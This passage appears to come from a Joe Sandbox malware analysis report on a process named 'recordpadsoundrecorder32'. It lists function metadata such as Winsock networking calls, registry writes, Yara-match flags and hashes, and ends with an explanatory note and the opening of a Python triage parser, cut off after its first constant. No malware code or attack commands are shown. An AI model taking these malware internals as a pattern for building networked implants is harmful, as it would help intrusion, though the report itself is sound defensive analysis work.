                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602EEE
                                                                                      • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02602EFD
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02602F0C
                                                                                      • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02602F36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Socketsetsockopt
                                                                                      • String ID:
                                                                                      • API String ID: 2093263913-0
                                                                                      • Opcode ID: 43d6bf3f7bf07e38c26114162e61683aa2347a78e0f8c3361940ca068e1ec472
                                                                                      • Instruction ID: c3c701d36535ead5817eeb12183da8bfa8671865e846dab84e46840816a923f9
                                                                                      • Opcode Fuzzy Hash: 43d6bf3f7bf07e38c26114162e61683aa2347a78e0f8c3361940ca068e1ec472
                                                                                      • Instruction Fuzzy Hash: EF018871951204BBDB305F65DC88F9FBBA9EF89761F058569F908DB281D77088408BB0
                                                                                      APIs
                                                                                        • Part of subcall function 02602D39: WSASetLastError.WS2_32(00000000), ref: 02602D47
                                                                                        • Part of subcall function 02602D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02602D5C
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602E6D
                                                                                      • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02602E83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Sendselect
                                                                                      • String ID: 3'
                                                                                      • API String ID: 2958345159-280543908
                                                                                      • Opcode ID: c9f355afa88ee2a3a8bf80be0010df0b0d1e3a069f21a7ce5602085dfa7338f0
                                                                                      • Instruction ID: 69e21f39a6669b63f33bc216646b3201d03dcd258c6b07f1ec7b58a75a442cf1
                                                                                      • Opcode Fuzzy Hash: c9f355afa88ee2a3a8bf80be0010df0b0d1e3a069f21a7ce5602085dfa7338f0
                                                                                      • Instruction Fuzzy Hash: 9F31B070A112099FDF19DFA0C8A8BEF7BAAAF05314F04455AEC05972C0E774A9959FA0
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602AEA
                                                                                      • connect.WS2_32(?,?,?), ref: 02602AF5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastconnect
                                                                                      • String ID: 3'
                                                                                      • API String ID: 374722065-280543908
                                                                                      • Opcode ID: 6e00718d1df19c1413bb45f82be5638435ab161c1aba14e034a58ffca88d2026
                                                                                      • Instruction ID: 2ae1a886a5e9f4b322b3ffe59e4e3f196454529811da2d5c5f2585cc2264ba53
                                                                                      • Opcode Fuzzy Hash: 6e00718d1df19c1413bb45f82be5638435ab161c1aba14e034a58ffca88d2026
                                                                                      • Instruction Fuzzy Hash: BA21D770E01204ABCF18AFB4C598AAFBBBAAF45324F14459DEC19933C0DB745A419F94
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 481472006-2768313731
                                                                                      • Opcode ID: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction ID: bfeb034239b7c7118683ac587487231c4a8ae608a4ee2d3b9eda992131e4dc08
                                                                                      • Opcode Fuzzy Hash: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction Fuzzy Hash: 4CE08630C18743E9D7117BA0CD088987FB1AB51314760463FE1A2754E1D73D549AEF4E
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 0afc1c5d77c07d77a1fa48a843dfdf3ba5404a11d1e38e2a9465414a52987d7c
                                                                                      • Instruction ID: fd96556776c3a594705b04fa8b60f7334925cd71c336d03e56ff7e336a78d42f
                                                                                      • Opcode Fuzzy Hash: 0afc1c5d77c07d77a1fa48a843dfdf3ba5404a11d1e38e2a9465414a52987d7c
                                                                                      • Instruction Fuzzy Hash: 925160B1905206DFCB09CF68C580AAEBBB1FF09311F14819DE8299B3D0D770A911DFA1
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 026036A7
                                                                                        • Part of subcall function 02602420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02602432
                                                                                        • Part of subcall function 02602420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02602445
                                                                                        • Part of subcall function 02602420: RtlEnterCriticalSection.NTDLL(?), ref: 02602454
                                                                                        • Part of subcall function 02602420: InterlockedExchange.KERNEL32(?,00000001), ref: 02602469
                                                                                        • Part of subcall function 02602420: RtlLeaveCriticalSection.NTDLL(?), ref: 02602470
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1601054111-0
                                                                                      • Opcode ID: cd7ebe9c79e16778245d2a35d45e30b49ea6e248932e766ddb5a5ed06979c40d
                                                                                      • Instruction ID: 58da807d47f698387e3f5afafd7acb2d74409cf6dce17dfa70483cd5b5ca6355
                                                                                      • Opcode Fuzzy Hash: cd7ebe9c79e16778245d2a35d45e30b49ea6e248932e766ddb5a5ed06979c40d
                                                                                      • Instruction Fuzzy Hash: 2211BFB5500209ABDB298E14CCC5FAB3B6AEF00355F10445AFE568A3D0C734E8B1EB98
                                                                                      APIs
                                                                                      • __beginthreadex.LIBCMT ref: 026120B6
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000002,0260A937,00000000), ref: 026120E7
                                                                                      • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,0260A937,00000000), ref: 026120F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleResumeThread__beginthreadex
                                                                                      • String ID:
                                                                                      • API String ID: 1685284544-0
                                                                                      • Opcode ID: c1bbed272e0d9d7aba737bf68877f9d23d1e44b6b8637eb9282129d3b844d9f0
                                                                                      • Instruction ID: 914cdb31826d90d72aedd437ca049ea1f18a80b0b9fea5837fa62adb0ee384f5
                                                                                      • Opcode Fuzzy Hash: c1bbed272e0d9d7aba737bf68877f9d23d1e44b6b8637eb9282129d3b844d9f0
                                                                                      • Instruction Fuzzy Hash: 05F0C270340210ABE7209E6DDC84F95B3E8EF48725F28456AFA44C7380C771B896CA90
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(0263729C), ref: 02601ABA
                                                                                      • WSAStartup.WS2_32(00000002,00000000), ref: 02601ACB
                                                                                      • InterlockedExchange.KERNEL32(026372A0,00000000), ref: 02601AD7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$ExchangeIncrementStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1856147945-0
                                                                                      • Opcode ID: 31420bdff8e85f6231bb2dea3eb2c1d6e93837bfcdbfe0ea05228a51aa589bc6
                                                                                      • Instruction ID: de73b7f9f58a32d9f745d26f0ae6d27f43702cce965635cae4a3f49818aa3d79
                                                                                      • Opcode Fuzzy Hash: 31420bdff8e85f6231bb2dea3eb2c1d6e93837bfcdbfe0ea05228a51aa589bc6
                                                                                      • Instruction Fuzzy Hash: F9D05EB1D80A085BE33366A0AC8FEBDF76CFB06B11F400651FC6AC01C0EA50656885A6
                                                                                      APIs
                                                                                      • RegSetValueExA.KERNELBASE ref: 0040D460
                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D469
                                                                                        • Part of subcall function 004022CB: WaitForSingleObject.KERNEL32(00000000,004090A8), ref: 0040D307
                                                                                      • ExitProcess.KERNEL32 ref: 0040DA91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExitObjectProcessSingleValueWait
                                                                                      • String ID:
                                                                                      • API String ID: 2192842637-0
                                                                                      • Opcode ID: 1b9f23a41c0e40b0f9311fce3c8bd035e8c111fac712162ec3806c88e8d3c095
                                                                                      • Instruction ID: 6b2c0eb9daf1d9ed9b036e29818b5d03816b1997dab4dfffd8741184c018fce9
                                                                                      • Opcode Fuzzy Hash: 1b9f23a41c0e40b0f9311fce3c8bd035e8c111fac712162ec3806c88e8d3c095
                                                                                      • Instruction Fuzzy Hash: EBC048B5804400ABC7402BF0AF5D91D3E68BB0830AB12587DB682B00A28E7840499F2D
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604BF2
                                                                                        • Part of subcall function 02601BA7: __EH_prolog.LIBCMT ref: 02601BAC
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601BBC
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601BEA
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601C13
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601C56
                                                                                        • Part of subcall function 0260E0A6: __EH_prolog.LIBCMT ref: 0260E0AB
                                                                                        • Part of subcall function 0260E0A6: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0260E12A
                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02604CF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                      • String ID:
                                                                                      • API String ID: 1927618982-0
                                                                                      • Opcode ID: 3127796c0133c1879e9e0f5658a7a973c6a361d40f7a66da3bb94c4b89295f0a
                                                                                      • Instruction ID: 12978c8a72a1eedf2a5ef1bb20141df60fad5128f737b7d7c7dd863a0e633cd8
                                                                                      • Opcode Fuzzy Hash: 3127796c0133c1879e9e0f5658a7a973c6a361d40f7a66da3bb94c4b89295f0a
                                                                                      • Instruction Fuzzy Hash: 30513871D04248DFDB19DFA8C984AEEBBB5EF08310F14805EE905AB391DB309A44DF94
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602D47
                                                                                      • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02602D5C
                                                                                        • Part of subcall function 0260A4B7: WSAGetLastError.WS2_32(00000000,?,?,02602A51), ref: 0260A4C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Send
                                                                                      • String ID:
                                                                                      • API String ID: 1282938840-0
                                                                                      • Opcode ID: 32f0ac22ec96d00c8c6d6ba2832389406d1ff6899159cdff3d3e1ce99f21d827
                                                                                      • Instruction ID: 5ea839dbba025957cfedef9b856ef05707cf55310c3c72677360a116b6dc24de
                                                                                      • Opcode Fuzzy Hash: 32f0ac22ec96d00c8c6d6ba2832389406d1ff6899159cdff3d3e1ce99f21d827
                                                                                      • Instruction Fuzzy Hash: 1F01B1B5401205AFDB245F94888886BBBECEF45360B24092EFC59832C0DB709D409B61
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 026083B5
                                                                                      • shutdown.WS2_32(?,00000002), ref: 026083BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastshutdown
                                                                                      • String ID:
                                                                                      • API String ID: 1920494066-0
                                                                                      • Opcode ID: ba166645e1c6e1358e1a97f65daec9f6fb73f26c95d2f1f05470de10e974c165
                                                                                      • Instruction ID: 81ad0e7b50c9be14e06d56d6e1ce20af00c149655525b3293fbd35a94c21030a
                                                                                      • Opcode Fuzzy Hash: ba166645e1c6e1358e1a97f65daec9f6fb73f26c95d2f1f05470de10e974c165
                                                                                      • Instruction Fuzzy Hash: 5AF06D756417148FC728AF94E444B5BB7E5AF49320F05481CED95973C1D770AC408BA5
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00403EEC: GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • HeapDestroy.KERNEL32 ref: 00404084
                                                                                        • Part of subcall function 0040440B: HeapAlloc.KERNEL32(00000000,00000140,0040406D,000003F8), ref: 00404418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2507506473-0
                                                                                      • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction ID: 795a75c142ce263548137c971673ec0d69254cf7c95aacf64765c85fef2462b4
                                                                                      • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction Fuzzy Hash: E9F065F060530199DB205F749F45B2A35989BC0765F10453FFB40F41D0EB788481990E
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260511E
                                                                                        • Part of subcall function 02603D7E: htons.WS2_32(?), ref: 02603DA2
                                                                                        • Part of subcall function 02603D7E: htonl.WS2_32(00000000), ref: 02603DB9
                                                                                        • Part of subcall function 02603D7E: htonl.WS2_32(00000000), ref: 02603DC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: htonl$H_prologhtons
                                                                                      • String ID:
                                                                                      • API String ID: 4039807196-0
                                                                                      • Opcode ID: 96685b17a031563e52fb9cf6aae37606a27fecbf71e5f1921288e857fb080af4
                                                                                      • Instruction ID: bf4d608907021df93bacf02c8832144e5f24152bedddc5180c880007c438db77
                                                                                      • Opcode Fuzzy Hash: 96685b17a031563e52fb9cf6aae37606a27fecbf71e5f1921288e857fb080af4
                                                                                      • Instruction Fuzzy Hash: 69814971D0424E8ECF09DFE8D180AEEBBB5AF48314F20815AD851B7380EB755A05DFA9
                                                                                      APIs
                                                                                      • FindCloseChangeNotification.KERNELBASE(?,16049F3D), ref: 0265F814
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: 3c4d18e7bfe1cd9132d015755601739588dfa2b39a92e35f03a92d99e666ccc2
                                                                                      • Instruction ID: b39d2ad864f789e61074f6cc7d21fdeff4c0dcd733e43c4c1f243be26eccb2b0
                                                                                      • Opcode Fuzzy Hash: 3c4d18e7bfe1cd9132d015755601739588dfa2b39a92e35f03a92d99e666ccc2
                                                                                      • Instruction Fuzzy Hash: FB416CB250C6049FE709BF28D895779BBE5FB54310F060A3DE6C283740EA356944CB8B
                                                                                      APIs
                                                                                      • FindCloseChangeNotification.KERNELBASE(?,16049F3D), ref: 0265F814
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: 172c2e20020e0095825ac449459bebe9d73a3d856d639e3976f14e1e61c77f24
                                                                                      • Instruction ID: 66adfeb23f641a12360a9cf41db20d5cf8b0e52560b92b30a83be148ac945758
                                                                                      • Opcode Fuzzy Hash: 172c2e20020e0095825ac449459bebe9d73a3d856d639e3976f14e1e61c77f24
                                                                                      • Instruction Fuzzy Hash: 77314CB251C6009FE70DBF28CC95679BBE5FB69210F060A3DE6D283350EA356444CB4B
                                                                                      APIs
                                                                                      • FindCloseChangeNotification.KERNELBASE(?,16049F3D), ref: 0265F814
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: 4e9b365c04a151068604c5e9ae79ebc7b4e58fc521cce118266fe5f1124640d2
                                                                                      • Instruction ID: 72a0bd9c53241e5e1d01a3de97c4035fc160c45d9ee10a50ceaef52143a97ccb
                                                                                      • Opcode Fuzzy Hash: 4e9b365c04a151068604c5e9ae79ebc7b4e58fc521cce118266fe5f1124640d2
                                                                                      • Instruction Fuzzy Hash: 17215EB251D6009FE70DBF28D89567ABBE5FB58210F06093DEAC283340EA356554C78B
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E974
                                                                                        • Part of subcall function 02601A01: TlsGetValue.KERNEL32 ref: 02601A0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prologValue
                                                                                      • String ID:
                                                                                      • API String ID: 3700342317-0
                                                                                      • Opcode ID: 812db600b82636306e42b64210127904c387396c145259abfe5ff7f119499df0
                                                                                      • Instruction ID: 645d32439dfdeb273065768f253bb63fd426a804aaf816bdfd4aa73ceb0b599b
                                                                                      • Opcode Fuzzy Hash: 812db600b82636306e42b64210127904c387396c145259abfe5ff7f119499df0
                                                                                      • Instruction Fuzzy Hash: 16214FB2D04219AFDB08DFA4D580AFFBBF9EF48310F10452EE805A3280D775A901DBA5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: eefd1e95fb316547433ebaadddf864f00d8e7a691ae25921879c6ab224b1dc3a
                                                                                      • Instruction ID: 981017347b2f85911804c433f8d6ee21102d84ca66dbc069719c3ca99b523be1
                                                                                      • Opcode Fuzzy Hash: eefd1e95fb316547433ebaadddf864f00d8e7a691ae25921879c6ab224b1dc3a
                                                                                      • Instruction Fuzzy Hash: 3311E2F3908624AFD3116A19DC417BABBE8DF95771F17052DEBC8D3740EA31484486D6
                                                                                      APIs
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 026033CC
                                                                                        • Part of subcall function 026032AB: __EH_prolog.LIBCMT ref: 026032B0
                                                                                        • Part of subcall function 026032AB: RtlEnterCriticalSection.NTDLL(?), ref: 026032C3
                                                                                        • Part of subcall function 026032AB: RtlLeaveCriticalSection.NTDLL(?), ref: 026032EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                      • String ID:
                                                                                      • API String ID: 1518410164-0
                                                                                      • Opcode ID: ab3715eb7cad401acac503ab8a37d20539cee5b0ed592313c4ae51ddeb109c25
                                                                                      • Instruction ID: 4f991c2001decb9976c0d582e849ddb48f9bce26105668e52cab9077034775f0
                                                                                      • Opcode Fuzzy Hash: ab3715eb7cad401acac503ab8a37d20539cee5b0ed592313c4ae51ddeb109c25
                                                                                      • Instruction Fuzzy Hash: F8014471614606AFD708DF59D8C5F56B7A9FF45321B10835DE828873D0EB70E821DBA4
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 9bd76a525ab7b5bae434e1f4c770649cafdabfffca845ef534a87c28b273427e
                                                                                      • Instruction ID: d347bfc3b6ea444fc54137c33d9f03f60a08c80690db1097bbabfe65e265d4d9
                                                                                      • Opcode Fuzzy Hash: 9bd76a525ab7b5bae434e1f4c770649cafdabfffca845ef534a87c28b273427e
                                                                                      • Instruction Fuzzy Hash: 550117B250C604EFE3056F09DC81A6EFBE9EFA5710F06482DEAD483310E771A850DA57
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E504
                                                                                        • Part of subcall function 026026DB: RtlEnterCriticalSection.NTDLL(?), ref: 02602706
                                                                                        • Part of subcall function 026026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0260272B
                                                                                        • Part of subcall function 026026DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02625B03), ref: 02602738
                                                                                        • Part of subcall function 026026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02602778
                                                                                        • Part of subcall function 026026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 026027D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                      • String ID:
                                                                                      • API String ID: 4293676635-0
                                                                                      • Opcode ID: 85f44ffb64f36cd519df812cc729a9a862834d05cc8d7de6d829f79d43ab8ddf
                                                                                      • Instruction ID: 8573233a6335daf90bd3a0c72322a3c38b3ec0d68dcaaff00cba5836fa14e644
                                                                                      • Opcode Fuzzy Hash: 85f44ffb64f36cd519df812cc729a9a862834d05cc8d7de6d829f79d43ab8ddf
                                                                                      • Instruction Fuzzy Hash: 1E01DCB0910B148FC728CF0AC240986FBF4EF88300B11C5AED84A8B321E375EA44CF90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 028445289e1d17ca44fd6ddc857260208a147ec373c43258bce9f01103d35b43
                                                                                      • Instruction ID: 35407e72e644422b4f690bcc2f847b3216d51792f8b5999b125aecd84f82dc6f
                                                                                      • Opcode Fuzzy Hash: 028445289e1d17ca44fd6ddc857260208a147ec373c43258bce9f01103d35b43
                                                                                      • Instruction Fuzzy Hash: 9FE0C260659403AEE98229D04EA497B3F4CD94138C3704536E2F3B21D3C727CD0B61EE
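The records above are the IDA plugin's per-function metadata. What a triage analyst actually wants from a long run of them is which functions live in executable memory that is not backed by a PE image (that is where an unpacked payload sits; note that the 0x2601000 dumps carry "Yara matches" while the image-backed 0x400000 dumps do not) and which Win32 calls each of those functions makes. The Python below is an added example, not Joe Sandbox code and not part of this report. Its sample input is two entries copied from this page (a constructed excerpt). It assumes, because the page does not document it, that the `.sdmp` name is laid out as `<proc>.<stage>.<dumpid>.<base>.<protect>.<flags>.<type>.<extra>` and that `protect` and `type` carry the standard Windows `PAGE_*` and `MEM_*` values; that assumption is consistent with the report's own "based on PE" flag (0x01000000 = MEM_IMAGE for the 0x400000 dumps, 0x00020000 = MEM_PRIVATE for the 0x2601000 dumps). It also decodes the two argument values the report prints in the clear: the `lPeriod` of `SetWaitableTimer` and the root key passed to `RegCreateKeyExA`.

```python
"""Turn Joe Sandbox 'Memory Dump Source' function entries into triage records.

Added example, not part of the report or of Joe Sandbox. It parses only the
fields visible on the page. Assumption: the .sdmp name layout is
<proc>.<stage>.<dumpid>.<base>.<protect>.<flags>.<type>.<extra> (the two
unlabelled fields are left raw) with Windows PAGE_* / MEM_* values.
"""
import re
from dataclasses import dataclass, field

PAGE_EXEC = {0x10, 0x20, 0x40, 0x80}          # PAGE_EXECUTE* protections
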